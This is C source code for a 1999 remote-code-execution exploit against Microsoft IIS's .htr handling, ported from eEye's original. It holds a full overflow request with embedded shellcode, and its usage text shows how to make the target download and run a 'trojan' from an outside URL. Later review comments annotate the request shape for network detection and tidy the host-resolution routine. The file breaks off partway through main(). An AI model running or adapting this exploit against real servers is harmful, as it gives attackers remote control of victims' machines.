/* to compile on solaris: change u_int32_t to uint32_t and type:
gcc -o iishack iishack.c -lnsl -lsocket -lresolv */
/***********************************************************/
/* IIS Exploit for Linux (c) 1999 Ultima */
/* ultima@snicker.emoti.com */
/* The original exploit as published by EEye was written */
/* in assembler, and is rather unportable. I wrote it in */
/* C, and it should compile and run on just about anything.*/
/* */
/* THIS IS ONLY FOR TESTING YOUR OWN SERVERS FOR THE */
/* VULNERABILITY. BY RUNNING THIS PROGRAM YOU ASSUME */
/* ALL LIABILITY FOR ANY AND ALL RESULTS CAUSED BY */
/* THIS PROGRAM, WHETHER DIRECT OR INDIRECT. IN NO CASE */
/* SHALL ULTIMA BE HELD RESPONSIBLE. */
/* */
/* Released: 6.16.1999 (Y2K Compliant!! =) */
/* */
/* This code is released under the terms of the LGPL */
/* Version 2 or later, at your discretion. */
/* */
/* The uninitialized egg was evolved from reverse- */
/* engineering the EEye exploit, and was injected into */
/* C. This is basically the same poison, with a different */
/* needle. Thanks to drkspyrit and the EEyes ppl, without */
/* which, this code would have not existed. */
/* He can be reached as barns@eeye.com. */
/* The eEye website is http://www.eEye.com */
/* Usage: ./iishack <server> <port> <trojan> */
/* The trojan is an http url (minus the http://) of a */
/* program you want to run on the server. Server and port */
/* are self-explanatory. */
/* Compiling: cc -o iishack iishack.c */
/* Example: */
/* ./iishack www.notthere.com 80 www.myisp.com/exploit.exe */
/***********************************************************/
#include
#include
#include
#include
#include
#include
#include
/*
 * egg: the complete HTTP request this program sends, stored as raw bytes.
 * Read literally, the initializer begins with "GET /" (71, 69, 84, 32, 47)
 * followed by a long run of 'A' (65) filler, continues with opaque
 * machine-code bytes (not annotated here), then a run of '!' (33), and ends
 * with ".htr HTTP/1.0\r\n\r\n\n" (46, 104, 116, 114, ... 13, 10, 13, 10, 10).
 * From a detection standpoint that outer shape -- a request line padded with
 * hundreds of 'A's and ending in ".htr" -- is what a network signature for
 * this 1999 IIS issue would match on.
 *
 * NOTE(review): counting the rows (15 + 71 rows of 16 + 7) the initializer
 * appears to hold 1158 values, one more than egglen -- confirm; using
 * `sizeof egg` instead of a hand-maintained constant would remove the
 * discrepancy.  urloff (1055) falls on the first element of the row that
 * starts the run of 33s, assuming every middle row holds 16 values; main()
 * is cut off below, so confirm against its copy loop that the url argument
 * is written there.
 */
#define egglen 1157 /* bytes main() sends; see NOTE above about the array size */
#define urloff 1055 /* offset where the url argument is presumably written -- confirm in main() */
unsigned char egg[] = {
71, 69, 84, 32, 47, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 176, 135, 103, 104, 176, 135, 103, 104, 144, 144, 144, 144, 88,
88, 144, 51, 192, 80, 91, 83, 89, 139, 222, 102, 184, 33, 2, 3, 216,
50, 192, 215, 44, 33, 136, 3, 75, 60, 222, 117, 244, 67, 67, 186, 208,
16, 103, 104, 82, 81, 83, 255, 18, 139, 240, 139, 249, 252, 89, 177, 6,
144, 90, 67, 50, 192, 215, 80, 88, 132, 192, 80, 88, 117, 244, 67, 82,
81, 83, 86, 178, 84, 255, 18, 171, 89, 90, 226, 230, 67, 50, 192, 215,
80, 88, 132, 192, 80, 88, 117, 244, 67, 82, 83, 255, 18, 139, 240, 90,
51, 201, 80, 88, 177, 5, 67, 50, 192, 215, 80, 88, 132, 192, 80, 88,
117, 244, 67, 82, 81, 83, 86, 178, 84, 255, 18, 171, 89, 90, 226, 230,
51, 192, 80, 64, 80, 64, 80, 255, 87, 244, 137, 71, 204, 51, 192, 80,
80, 176, 2, 102, 171, 88, 180, 80, 102, 171, 88, 171, 171, 171, 177, 33,
144, 102, 131, 195, 22, 139, 243, 67, 50, 192, 215, 58, 200, 117, 248, 50,
192, 136, 3, 86, 255, 87, 236, 144, 102, 131, 239, 16, 146, 139, 82, 12,
139, 18, 139, 18, 146, 139, 215, 137, 66, 4, 82, 106, 16, 82, 255, 119,
204, 255, 87, 248, 90, 102, 131, 238, 8, 86, 67, 139, 243, 252, 172, 132,
192, 117, 251, 65, 78, 199, 6, 141, 138, 141, 138, 129, 54, 128, 128, 128,
128, 51, 192, 80, 80, 106, 72, 83, 255, 119, 204, 255, 87, 240, 88, 91,
139, 208, 102, 184, 255, 15, 80, 82, 80, 82, 255, 87, 232, 139, 240, 88,
144, 144, 144, 144, 80, 83, 255, 87, 212, 139, 232, 51, 192, 90, 82, 80,
82, 86, 255, 119, 204, 255, 87, 236, 128, 252, 255, 116, 15, 80, 86, 85,
255, 87, 216, 128, 252, 255, 116, 4, 133, 192, 117, 223, 85, 255, 87, 220,
51, 192, 64, 80, 83, 255, 87, 228, 144, 144, 144, 144, 255, 108, 102, 115,
111, 102, 109, 84, 83, 33, 128, 141, 132, 147, 134, 130, 149, 33, 128, 141,
152, 147, 138, 149, 134, 33, 128, 141, 132, 141, 144, 148, 134, 33, 128, 141,
144, 145, 134, 143, 33, 120, 138, 143, 102, 153, 134, 132, 33, 104, 141, 144,
131, 130, 141, 98, 141, 141, 144, 132, 33, 120, 116, 112, 100, 108, 84, 83,
33, 147, 134, 132, 151, 33, 148, 134, 143, 133, 33, 148, 144, 132, 140, 134,
149, 33, 132, 144, 143, 143, 134, 132, 149, 33, 136, 134, 149, 137, 144, 148,
149, 131, 154, 143, 130, 142, 134, 33, 144, 152, 143, 79, 134, 153, 134, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 46, 104, 116, 114, 32, 72, 84, 84, 80, 47, 49,
46, 48, 13, 10, 13, 10, 10 };
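/*
 * resolve: turn HOST (a dotted-quad string or a hostname) into an IPv4
 * address in network byte order.
 *
 * Returns the address, or 0 (INADDR_ANY) when HOST is empty, unparseable
 * and unresolvable, or resolves to something other than a 4-byte IPv4
 * address.  0 is an in-band failure sentinel, as in the original, so the
 * caller must check for it before using the value.  A resolver failure is
 * reported on stderr via herror(), as before.
 *
 * Defects fixed relative to the original:
 *  - inet_addr()'s INADDR_NONE (0xFFFFFFFF) was compared against a 64-bit
 *    `long` -1, which never matches on LP64 hosts, so an unparseable host
 *    silently became 255.255.255.255.  inet_pton() reports success and
 *    failure explicitly and has no ambiguous return value.
 *  - the result was read as *(long *)h_addr_list[0]: an 8-byte, possibly
 *    misaligned read of a 4-byte address (out-of-bounds and an aliasing
 *    violation), and the preceding memcpy into `n` was dead.  The address
 *    is now copied with memcpy after h_addrtype/h_length are checked.
 *
 * Note: gethostbyname() is not re-entrant and returns a static buffer; this
 * program is single-threaded, so that matches the original's assumption.
 */
u_int32_t resolve(const char *host) /* for solaris, try uint32_t */
{
    struct in_addr addr;
    struct hostent *he;
    u_int32_t result = 0;

    if (host == NULL || *host == '\0') {
        return 0;
    }

    /* Numeric form first: no resolver round-trip for a dotted quad. */
    if (inet_pton(AF_INET, host, &addr) == 1) {
        return addr.s_addr;
    }

    he = gethostbyname(host);
    if (!he) {
        herror("gethostbyname");
        return 0;
    }

    /* Only accept an IPv4 answer of exactly the width we copy. */
    if (he->h_addrtype != AF_INET || he->h_length != (int)sizeof result
        || he->h_addr_list == NULL || he->h_addr_list[0] == NULL) {
        fprintf(stderr, "gethostbyname: no IPv4 address for %s\n", host);
        return 0;
    }

    memcpy(&result, he->h_addr_list[0], sizeof result);
    return result;
}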
int main(int argc, char **argv)
{
char *server;
int port;
char *url;
int fd;
struct sockaddr_in s_in;
int i=0,x,j=0;
int first=0;
if(argc != 4)
{
fprintf(stderr, "usage: %s \n", argv[0]);
exit(1);
}
server = argv[1];
port = atoi(argv[2]);
url = argv[3];
if(strlen(url) > 85)
{
fprintf(stderr, "Trojan name must be less than 85 characters.\n");
exit(1);
}
for(x=0;x